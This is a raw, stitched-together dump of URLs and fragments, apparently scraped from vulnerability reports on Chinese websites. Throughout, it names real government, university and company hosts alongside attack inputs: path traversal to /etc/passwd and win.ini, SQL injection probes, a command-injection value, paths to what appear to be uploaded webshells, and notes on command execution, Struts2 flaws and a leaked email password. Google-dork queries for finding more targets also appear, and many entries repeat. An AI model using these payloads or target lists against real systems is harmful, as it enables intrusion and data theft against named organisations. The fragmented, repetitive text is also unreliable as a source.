ipsec:/usr/bin/ksh user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:/usr/bin/ksh esa:/usr/bin/ksh empty:/usr/bin/ksh mont:/usr/bin/ksh rt:/usr/bin/ksh www.eqyn.com/manage/content/docmanage/download.jsp?filePath=../../../../../../../etc/passwd www.eqyn.com/manage/content/docmanage/download.jsp?filePath=../../../../../../ http://www.chinajob.gov.cn/ http://www.chinajob.gov.cn/job12333/ http://www.chinajob.gov.cn/job12333/WebPage.Admin/Login.aspx https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=regist&rand=sjrand&0.54322674895787 https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=other&rand=sjrand&0.36124213441517 http://sphy.org.cn/ http://its.bit.edu.cn/)存在命令执行漏洞,可远程获取服务器管理权限。 http://staff.fesco.com.cn/ http://staff.fesco.com.cn/benefit/goods.aspx?hid=10141 http://staff.fesco.com.cn/admin/login.aspx http://**.**.**/ http://hikbbs.hikvision.com/forum.php,站点是海康威视的经销商论坛,直接传图就可以getshell。 http://96361.xyhdz.gov.cn/xinwen.php?id=6 http://96361.xyhdz.gov.cn/xinwen.php?id=6 http://96361.xyhdz.gov.cn/ http://96361.xyhdz.gov.cn/file_down.php?file=./upload/file/20150324/5511184b6d826.php&name=1.php http://96361.xyhdz.gov.cn/upload/file/20150324/5511184b6d826.php http://si.cnc.cn/ http://si.cnc.cn:80/ucsisite/search.jsp http://si.cnc.cn:80//ucsisite/search.jsp ftp://58.61.71.24 http://xile.xunbao178.com inurl:/qsjsrzj/logindw.jsp http://www.lcwscgs.com/qsjsrzj/logindw.do www.lcwscgs.com http://zhanglife.ustb.edu.cn/)存在命令执行漏洞,可远程控制服务器。 http://ticket.gdcd.gov.cn/Schedule.aspx http://shop.fesco.com.cn/phpmyadmin/index.php http://220.178.13.7:8080/news/newsread.aspx?classname=地方交流&classid=hjz_dfxx&articleid=m5o1qc2015129145821 http://220.178.13.7:8080/news/newsread.aspx?classname=地方交流&classid=hjz_dfxx&articleid=m5o1qc2015129145821 http://sns.neusoft.com/ http://estore.wacom.com.cn http://ycxl.net/index.php?m=Article&a=index&id=22 http://www.ycgjgs.com/ http://www.ycgjgs.com//news.php?id=475 http://www.ycgjgs.com//qynews.php?type=8 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://cg.lashou.com/new_index.php?class=FindPasswd&old=0 http://www.gzfb.gov.cn/fwdt/SingleChild/DWSH/Login.aspx http://www.gzfb.gov.cn/fwdt/SingleChild/DWSH/Login2.aspx http://www.gzfb.gov.cn/fwdt/SingleChild/DWSH/Login.aspx http://www.gzfb.gov.cn/fwdt/SingleChild/DWSH/Login2.aspx http://im.mgyun.com/ http://mp.weixin.qq.com/wiki/3/17e6919a39c1c53555185907acf70093.html http://m.weigouyi.com/130124143905063115.html http://www.weigouyi.com/Case/ http://www.haohandata.com.cn/job/job.php?class=9 http://www.haohandata.com.cn/job/job.php?class=9 http://sqlmap.org http://www.gxdzhj.gov.cn/showarticle.php?nid=438 http://222.66.163.38/hudson/job/crm/ws/ http://222.66.163.38/dongfangcrm-web/login.html;jsessionid=60E4F8156C2C165D7E1D153C4AA295A7 http://www.ahjjjc.gov.cn http://www.betcity.com.tw/phpMyAdmin/ https://github.com/xiaofeng993229/reportv-2.0/blob/c966b98ee97b85154202d500d158ddfc5f0bbffe/daemons/tryeatReport.php https://207.97.148.78/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://shixi.189.cn/shixibao/ucenter/ http://bbs.10yan.com/config/config_global.php.bak http://www.chinanpohr.com/admin/ http://app.wanda.cn/APPREP/film http://221.232.128.166:8080 http://dc.99.com http://static.dc.99.com/App_Script/XT/userlogin.js http://dc.99.com/YB/Paper/Answer.aspx?paperid=2472 http://dc.99.com//Attach/【魔域口袋版】羊年贺岁版礼包预约问卷201502121126212795.zip http://cs.njfu.edu.cn/yzbywlw/login.action http://www.wanchezhijia.com/登陆处 www.wanchezhijia.com http://www.maimaimai.com.cn/login.html http://www.dxb.sdu.edu.cn/list_art.php?sortid=6&id=73 http://www.culture.sdu.edu.cn/surrounding_t.php?er_id=37 http://www.wqk8.com http://www.bfyhyc.com/yjkxxx.asp?id=1&psid=1 http://www.bflad.com/yjkxxx.asp?id=1&psid=1 http://www.luoyangxiaofang.com/yjkxxx.asp?id=1&psid=1 http://www.lycbxf.com/yjkxxx.asp?id=1&psid=1 http://dzj777.com/yjkxxx.asp?id=1&psid=1 http://tjchangguan.com/yjkxxx.asp?id=1&psid=1 http://www.lydahua.com.cn/yjkxxx.asp?id=1&psid=1 http://www.13937942506.com/yjkxxx.asp?id=1&psid=1 http://lyjzdz.com/yjkxxx.asp?id=1&psid=1 http://www.liangxianjun.com/yjkxxx.asp?id=1&psid=1 http://www.qqldw.cn/yjkxxx.asp?id=1&psid=1 http://www.liangxianjun.com/yjkxxx.asp?id=1&psid=1 http://www.healthtc.com/media_list.php?kid=3 http://180.168.124.132/toms/ http://www.czfc.org.cn/txxw_contact.asp?ProductID=2198 www.qhca.gov.cn:80/QHCMS/getfileservlet?path=../../../../../../../../../../../.././windows/win.ini%00.html http://www.nongyou.com.cn/ http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword= http://221.2.171.59:8000/gov/SearchInfoSum.aspx?keyword= http://222.135.109.70:8100/gov/SearchInfoSum.aspx?keyword= http://61.133.119.187:8089/gov/SearchInfoSum.aspx?keyword= http://221.2.156.181:8100//gov/SearchInfoSum.aspx?keyword= http://221.2.149.47:8100/gov/SearchInfoSum.aspx?keyword= http://222.135.127.190:7000/gov/SearchInfoSum.aspx?keyword= https://ticket.wandaperformance.com/user/find http://zxks.nm.zsks.cn/zkweb/zk_kkzykc.jsp?zydm=020106 http://www.hicar.com.tw/Index.asp?CID=16&CID2=%EF%BF%BDn%EF%BF%BDX%EF%BF%BD%EF%BF%BD_B http://117.79.80.15:8081/index.html http://**.**.**/login.aspx_ http://36.48.70.34:8086/cczfbz/jsp/system/logindw.jsp http://www.kmtaizhu.com/news_show.php?id=1 http://www.yishengcao.com/thi.php?id=1 http://www.yn-led.com/thi.php?id=4 http://www.mufoedu.com/thi.php?id=1 http://www.kmliyade.com/newsxx.aspx?id=464 https://github.com/morgan0329/platform/ aobo.tcl.com/leftabout.asp?id=37 http://www.msaonline.gov.cn/xx_SJshow.aspx?id=2015/3/9/P2015392920269b384a5fb41.html http://oa.hunantv.com/seeyon/ http://www.999lm.com/phpmadmin/pmd_relationsma.php www.bbready.com http://www.bbready.com http://202.115.138.250/ http://www.wenjuan.com/s/u6BzYz/,其中最后一个问题,对输入的内容没有做过滤 com:5658/esfcrmsite/model/SysManage/Document/DownLoadDoc.aspx?DocUrl=../web.config http://www.fuji.com.tw, http://used.dangdang.com/ajax_proxy.php?action=research_submit&content=&email=&ques_type=3&request_url=ajax_proxy.php&sender_url=http%3A//used.dangdang.com/survey.php&type=660 http://tuan.bitauto.com/brand?spell= http://bbs.a9vg.com/forum.php http://f16.7daysinn.cn:8080/log/serverLog http://f16.7daysinn.cn:8080/log/serverLog/localhost_access_log.2015-03-22.txt http://f16.7daysinn.cn:8080/log/appLog/app-info.log www.hnagroup.com http://www.hnagroup.com/index.php/lifestyle/?category=&order=%5c http://www.hnagroup.com/takelovehome/ajax?page=%5c&perpage=10&type=recent http://www.hnagroup.com/welcome2015/comment_ajax/get?page=%5c&perpage=10 http://www.hnagroup.com//industry/?submenu=aviation%26n946669%3dv962150 index.php/industry/?submenu=aviation%26n964489%3dv983194 index.php/industry/detail?id=171&submenu=aviation%26n917435%3dv904711 index.php/lifestyle/?category=1%26n980832%3dv977422 http://www.cloud511.com/case http://www.zjrrt.com/ http://www.ewj2009.com/ http://www.nbzyyy.com/ http://test.hzyibai.com/ http://www.zjtydyf.com/ http://leisuredak.com/ http://www.yizheng.cc/ http://www.edutech.com.cn http://*/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://www.edutech.com.cn/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://www.edutech.com.cn/cms/uploaddir/product/4d697d9967ee9354a2941ffcb0351636.jpg http://www.edutech.com.cn/cms/uploaddir/*savepath的值/返回的值 http://www.edutech.com.cn/cms/uploaddir/user/15c030fe752c02accd6b99de3e74c564.jpg http://fe.bnu.edu.cn/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://fe.bnu.edu.cn/upload_dir/1/news/201503/c5c4ab8718bf4e770d1e6cae35546b41.jsp http://www.wkmk.cn/sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://wlkc.jtdx.com.cn//sysImageUploadAction.do?method=uploadimage&savepath=user&pathtype=D&sketch=vod http://wlkc.jtdx.com.cn/upload_dir/user/2015-03-25/668763c8d469d704b2e1d9926061ae15.jsp http://cc.yundasys.com:8087/callcenter_new/popedom/userExit.action https://github.com/tutucute567/smart_scheduler/blob/2049408996b98e08fdc7b0c0cb46c06e843e8a8f/code/servers/rule_engine/code/script/mail.py rtsp://192.168.1.1/ http://shop.zhe800.com/users/addresses http://shop.zhe800.com:80/users/addresses http://www.wholeton.com/Anli.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 http://111.206.133.4/ http://mail.hualiu.cc/ http://agent.mchina.cn/front/preregist/out_key_query_submit_new.action http://222.85.90.197:8080/CncConference/control/index.jsp http://www.apabi.cn POST:key=1 http://202.119.210.5/dlib/bbs/bbs_search.asp?lang=gb http://210.37.2.181/dlib/bbs/bbs_search.asp?lang=gb http://210.34.4.3/dlib/bbs/bbs_search.asp?lang=gb http://202.117.24.8/dlib/bbs/bbs_search.asp?lang=gb http://apabi.lib.njit.edu.cn/bbs/bbs_search.asp?lang=gb http://www.zoomeye.org/search?q=Etag:%20%221397468047:a2bb%22%20port:80%20country:China&p=3&t=host http://58.132.89.157/ http://58.132.89.156/ http://58.132.89.158/ http://113.200.242.130/ http://120.37.120.228/ http://61.177.142.251/ http://www.ahgd.gov.cn/bmxx.php?bid=1 http://www.ahgd.gov.cn/bmxx.php?bid=1 http://www.ahgd.gov.cn/bmxx.php?bid=1 http://www.htgq.gov.cn/news/show.asp?id=599 http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://219.239.42.152/webfig/#Tools:Bandwidth_Test http://www.ycjsy.com/ http://www.ycjsy.com/mxzc.asp?userid=87 demo:http://show.wecrm.com/xt/main demo:http://show.wecrm.com/xt/main demo:http://show.wecrm.com/xt/main http://show.wecrm.com/xt/CrmMainFrame/MyWorkPartial/ demo:http://show.wecrm.com/xt/main http://show.wecrm.com/xt/main/SaveModuleCfg/ http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.wholeton.com/Anli.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 http://111.206.133.4/ http://mail.hualiu.cc/ http://123.138.37.155:8090/jnmis2/xt/login.action存在st2漏洞 http://61.138.121.123:8080/alsmgljpt/xt/login.action http://suggestion.baidu.com/su;/1.bat?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875 http://df.ceair.com/BGGTracer/Login.aspx http://www.jinritemai.com/address/delete http://doogua.dangdang.com/api.php?/=book/search http://career.fesco.com.cn/register http://www.wholeton.com/Anli.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 http://111.206.133.4/ http://mail.hualiu.cc/ http://**.**.**/free_portalLoginRedirect.wlan http://dm.10086.cn/weixin/index.php?s=/addon/Biaobai/Index/bb/uid/126654%27%20and%20%272%27=%272/ http://dm.10086.cn/weixin/index.php?s=/addon/Biaobai/Index/bb/uid/126654%27%20and%20%272%27=%271/ http://www.51yund.com/download.html http://yun.zjer.cn/index.php?r=studio/affiche/details&id=56 http://www.sspplan.com/web/newsAction!queryNewsDetail.action demo:http://show.wecrm.com/xt/main inurl:multi_detail.jsp?pk_corp= http://114.242.137.125/dap/dtalent/drs/default/multi_detail.jsp?pk_corp=10102%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20&channel=3&innercode=001 http://123.124.148.248:8888/dap/dtalent/drs/default/multi_detail.jsp?pk_corp=11410301115121350280&channel=3&innercode=001 http://zhaopin.bjcyh.com/dap/dtalent/drs/default/multi_detail.jsp?pk_corp=11411181908130600017&channel=3&innercode=001 http://211.103.167.51/dtalent/dtalent/drs/default/multi_detail.jsp?pk_corp=11401201043552010286&channel=4&innercode=002 http://hr.xwhosp.com.cn/dtalent/dtalent/drs/default/multi_detail.jsp?pk_corp=11310291516308100967&channel=4&innercode=001 http://edu.ekwing.com/doc/researchlist?album_id=1&class_id=1&order=1 http://www.ekwing.com/doc/researchlist?album_id=1&class_id=1&order=1 http://chinarejt.21tb.com/login/login.logout.do http://www.kiford.com/ www.kiford.com http://www.kiford.com http://www.trainingmag.com.cn/course/Course_Search.aspx?Action=Search&Type=Cor550777195472 www.taiwan.cn,简称台湾网)是国务院台办管理的国家重点新闻网站,是涉台服务的综合门户网站,是两岸交流合作的权威平台。 http://apps.chinataiwan.org http://www.oppo.com/resource/UA-PROF/ONEPLUSA0001.xml http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx www.szgt.gov.cn http://is.gd/VFuwkm www.hcbtv.com http://115.29.16.20:6000/admin http://t.cn/RZgOxiR http://blog.zhulong.com/u10104299/blogdetail4781721.html http://cms.moyi365.com/doc/researchlist?album_id=1&class_id=1&order=1 http://cms.ekwing.com/doc/researchlist?album_id=1&class_id=1&order=1 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item6.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item6.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item6.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item6.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item6.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item6.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item6.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item6.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item6.aspx?id=1 http://medapp.ranknowcn.com/log.txt http://yy.ranknowcn.com/m/login.php http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item5.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item5.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item5.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item5.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item5.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item5.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item5.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item5.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item5.aspx?id=1 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item4.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item4.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item4.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item4.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item4.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item4.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item4.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item4.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item4.aspx?id=1 http://210.22.113.182:9090/dashboard.action http://211.81.174.133:81/dlib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=2&CategoryTypeID=1&BrowseID=12&BrowseName=%B4%AB%BC%C7%BB%D8%D2%E4%C2%BC http://apabi.library.nenu.edu.cn/dlib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=2&CategoryTypeID=1&BrowseID=10&BrowseName=%CE%C4%D1%A7 http://dlib.fxlib.cn:8282/dlib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=2&CategoryTypeID=1&BrowseID=5&BrowseName=%D5%FE%D6%CE http://61.167.120.67:8083/DLib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=2&CategoryTypeID=1&BrowseID=1&BrowseName=%BC%C6%CB%E3%BB%FA%CD%F8%C2%E7 http://dzts.nsjy.com/dlib/List1.asp?lang=gb&act=CategoryBrowse&DocGroupID=10&CategoryTypeID=1&BrowseID=1&BrowseName=%BC%C6%CB%E3%BB%FA%CD%F8%C2%E7 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item1.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item1.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item1.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item1.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item1.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item1.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item1.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item1.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item1.aspx?id=1 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item3.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item3.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item3.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item3.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item3.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item3.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item3.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item3.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item3.aspx?id=1 http://www.nongyou.com.cn/ http://61.133.119.187:8091/newsymItemManage/Item2.aspx?id=1 http://222.135.76.147:8200/newsymItemManage/Item2.aspx?id=1 http://222.135.127.190:7200/newsymItemManage/Item2.aspx?id=1 http://221.2.149.47:8200/newsymItemManage/Item2.aspx?id=1 http://218.59.205.41:8053/newsymItemManage/Item2.aspx?id=1 http://jwh.tanljgzx.gov.cn/newsymItemManage/Item2.aspx?id=1 http://221.2.171.59:8200/newsymItemManage/Item2.aspx?id=1 http://218.56.159.98:8001/newsymItemManage/Item2.aspx?id=1 http://123.134.189.60:8016/newsymItemManage/Item2.aspx?id=1 http://www.hzzoy.com/ http://www.bllib.net.cn:8080/lcd/lcd_Search.html?Keyword= http://www.msit21.com//lcd/lcd_Search.html?Keyword= http://218.2.112.243:8080/lcd/lcd_Search.html?Keyword= http://218.108.51.86/lcd/lcd_Search.html?Keyword= http://122.225.192.136/lcd/lcd_Search.html?Keyword= http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://teda.nankai.edu.cn/ScanWebshell.asp?act=scan http://www.cloud511.com/case http://www.zjrrt.com/ http://www.ewj2009.com/ http://www.nbzyyy.com/ http://test.hzyibai.com/ http://www.zjtydyf.com/ http://leisuredak.com/ http://www.yizheng.cc/ http://code.taobao.org/p/lfhzshop/src/trunk/data/config.php http://www.lszhen.com/ http://code.taobao.org/p/shiji_be/src/config/config.php http://www.msit21.com/board/board_list.html?ListID=1 http://218.2.112.243:8080/board/board_list.html?ListID=1 http://202.197.107.11:86/board/board_list.html?ListID=3 http://mail.tdsy.org/board/board_list.html?ListID=1 http://218.108.27.9/board/board_list.html?ListID=1 www.21cake.com http://www.bbready.com/cart-checkout.html http://www.jiathis.com/code/swf/m.swf appName:String mySo:SharedObject http://zzb.hrbeu.edu.cn/article/list.asp?classid=8 http://dpd.hrbeu.edu.cn/index.php?action=list&classid=4&cid=63 http://hospital.hrbeu.edu.cn/info/showinfo.asp?infoid=2147 http://chengeng.hrbeu.edu.cn/showarticle.php?articleid=531 http://qihang2010.hrbeu.edu.cn/yglt/ShowArticle.asp?ArticleID=14428 http://qihang.hrbeu.edu.cn/showdown.php?id=135 http://www.wooyun.org/bugs/wooyun-2010-0103731/trace/871e09c984979a433fdb3724361d4ba9 http://vip.51wan.com http://acccen.xmu.edu.cn/news/m-list.asp?nType=2 http://jmzx.xmedu.cn:9999/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 http://218.78.241.80/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 http://www.xwgjzx.com:8888/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 http://szxx.pudong-edu.sh.cn/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 http://www.gxbyzx.cn:88/anmai/Edis/home_school/sudjectdiscussmanage.aspx?cz=del&number=1 demo:http://show.wecrm.com/xt/main http://jmzx.xmedu.cn:9999/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 http://218.78.241.80/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 http://szxx.pudong-edu.sh.cn/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 http://www.gxbyzx.cn:88/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 http://www.xwgjzx.com:8888/anmai/Elective/ClassInfo/CallOverDown_2.aspx?itemid=1 http://www.zc511.com/ http://www.smdyf.cn/getNewsList.do?newsType=123 http://www.jylbx.com/getNewsList.do?newsType=123 http://www.46buy.com/fyct/getNewsList.do?newsType=123 http://www.jkzx1818.com/getNewsList.do?newsType=3 http://test.360lbx.com/getNewsList.do?newsType=123 http://www.js96296.com/dzyyt_wt/cnnet/info/getProductFloor.jspx http://www.js96296.com/dzyyt_wt/cnnet/info/getProductInfo.jspx?ipage=10&prodChannel=0&prodsearchType=&sortType=&sortWay=asc http://www.js96296.com/dzyyt_wt/cnnet/info/remoteControll.jspx?boardId=-1&titleId=10 http://www.js96296.com/dzyyt_wt/cnnet/info/toBusinessmanager.jspx?boardId=5&titleId=-1 http://www.js96296.com/dzyyt_wt/cnnet/in http://sqlmap.org http://220.180.202.150:8008/ http://www.hzyibai.com/showProductMessage.do?productId=248407&curPage= http://www.smdyf.cn/showProductMessage.do?productId=146576&curPage= http://www.ewj2009.com/showProductMessage.do?productId=247012&curPage= http://test.360lbx.com/showProductMessage.do?productId=250199&curPage= http://www.gxjjls.com/showProductMessage.do?productId=250507&curPage= http://computer.ytu.edu.cn/newssys/list.php?cat=0 http://mhz.pw/game/jiathis/jiathis.html http://findbrazil.go.163.com/ http://mjob.12582.cn/ http://mjob.12582.cn/my/traditionalword?type=tra&userid=1471735 http://mjob.12582.cn/my/traditionalword?type=tra&userid=1480694 http://www.wholeton.com/Anli.php https://test.bescar.com https://angelic.com.cn/ http://222.223.56.116 https://222.92.15.100 http://111.206.133.4/ http://mail.hualiu.cc/ http://www.leadbank.com.cn/ http://wechat.leadbank.com.cn/loginAction.action http://www.zc511.com/ http://www.hzyibai.com/getQuestionByProductId.do?productId=248463&curPage= http://www.nbzyyy.com/getQuestionByProductId.do?productId=250195&curPage= http://www.gxjjls.com/getQuestionByProductId.do?productId=250572&curPage= http://test.zjydyf.com/getQuestionByProductId.do?productId=130963&curPage= http://www.ewj2009.com/getQuestionByProductId.do?productId=246938&curPage= http://www.cnz.cn/validateCode.do http://www.cnz.cn/wooyun.jsp http://951.demo.cnz.cn/validateCode.do http://951.demo.cnz.cn/wooyun.jsp http://wolife.17wo.cn/server-info和http://wolife.17wo.cn/server-status http://wolife.17wo.cn/security/index.php http://code.it168.com/d-25428.shtml inurl:showflfg.asp?id= http://www.yn148.net/showflfg.asp?id=22 http://www.dbawx.com/showflfg.asp?id=21 http://www.keyels.com/showflfg.asp?id=29 http://www.huahailawyer.com/showflfg.asp?id=16 http://www.czxyqc.com/en1/Showflfg.asp?id=91 http://www.xiamenair.com/)官方email邮箱et@xiamenair.com密码泄漏,信件中包含很多用户敏感信息,同时还可以获取整个厦门航空公司员工姓名、email邮箱和手机号码等信息,这些信息如果用在社工上,大家可以想象一下后果。 http://**.**.**/getindex.action_ http://m.turtlebeach.com/productsDetails.action jdbc:mysql://localhost:3308/mobile_tb_cms?autoConnect=true http://click.xiu.com/sys/gotoSysUserLogin.action http://click.xiu.com/sys/loginSysUser.action demo:http://show.wecrm.com/xt/main http://down.chinaz.com/soft/29472.htm inurl:Showclient.asp?id= http://www.1518.name/ShowClient.asp?id=2525 http://www.cshlyc.com/showclient.asp?id=200 http://www.buyiju.wang/ShowClient.asp?id=2496 http://www.ahcm.cc/ShowClient.asp?id=2463 http://ohg-il.com/ShowClient.asp?id=1 http://www.ehsy.com/ http://www.rjh.com.cn/rjhsearch/Pages/Detail.aspx?yggh=J9418 http://www.rjh.com.cn/RUIJIN_Portal_ClickCount_WebSite/ClickOrder.aspx?PortalType=rjh http://www.rjh.com.cn/mzynjbapp/Expert/OfficeList.aspx?OfficeID=4160000 http://fy3.cdpc.org.cn/ http://fy3.cdpc.org.cn/PopUpWindow/ChildBirthPersonSecond.aspx?id=189 http://www.auxgroup.com/JobList.aspx?type=1 http://libweb.yuntech.edu.tw:8080/ireading/index.action http://sell.2.taobao.com/ http://down.chinaz.com/soft/29472.htm http://www.laco-hr.com/showdxal.asp?id=66 http://www.pundun.cn/showdxal.asp?id=66 http://www.szcxl.com/showdxal.asp?id=63 http://www.jshbls.com/showdxal.asp?id=19 http://www.xmpangu.com/showdxal.asp?id=74 http://223.202.6.25:8080/是接入系统链接。 parameters:shopId http://www.ewj2009.com/getShopMessage.do?shopId=481 http://www.jhtht.com/getShopMessage.do?shopId=301 http://www.smdyf.cn/getShopMessage.do?shopId=124 http://www.zjrrt.com/getShopMessage.do?shopId=648 http://test.9nihao.com/getShopMessage.do?shopId=261 http://admin.601601.com/login http://www.zc511.com/showIndex.do Data:shopName=%E5%BA%97&curPage=1&pageSize=5&province=0&city=0&district=0 Parameter:shopName www.****.com http://www.****.com http://activity.tudou.com/javax.faces.resource.../WEB-INF/web.xml.jsf http://activity.tudou.com/javax.faces.resource.../WEB-INF/classes/spring/spring-servlet.xml.jsf http://activity.tudou.com/javax.faces.resource.../WEB-INF/classes/spring/main.xml.jsf http://activity.tudou.com/javax.faces.resource.../WEB-INF/velocity/toolbox.xml.jsf http://www.zc511.com/showIndex.do http://www.smdyf.cn/getShopMapDetail.do?shopId=68 http://www.ewj2009.com/getShopMapDetail.do?shopId=451 http://www.jhtht.com/getShopMapDetail.do?shopId=301 http://www.zjrrt.com/getShopMapDetail.do?shopId=648 http://test.9nihao.com/getShopMapDetail.do?shopId=261 inurl:hn_news.asp?id= http://www.sxkaize.cn/hn_news.asp?id=114 http://www.sxhaoyao.com/hn_news.asp?id=361 http://www.xywcsyyey.com/web/hn_news.asp?id=582 http://www.sxhyys.com/hn_news.asp?id=377 http://www.xyrip.com/hn_news.asp?id=306 http://www.xygmjx.com/hn_news.asp?id=337 http://www.xyqinxu.com/hn_news.asp?id=330 http://www.xyhaitong.com/hn_news.asp?id=320 http://www.sxyf.cn/hn_news.asp?id=342 http://www.xywhblg.com/hn_news.asp?id=311 http://www.xyzqjzlw.com/hn_news.asp?id=275 http://app.gooooal.com/newsTree.do?keyword= http://sqlmap.org http://bbs.qule.com/uc_server/admin.php 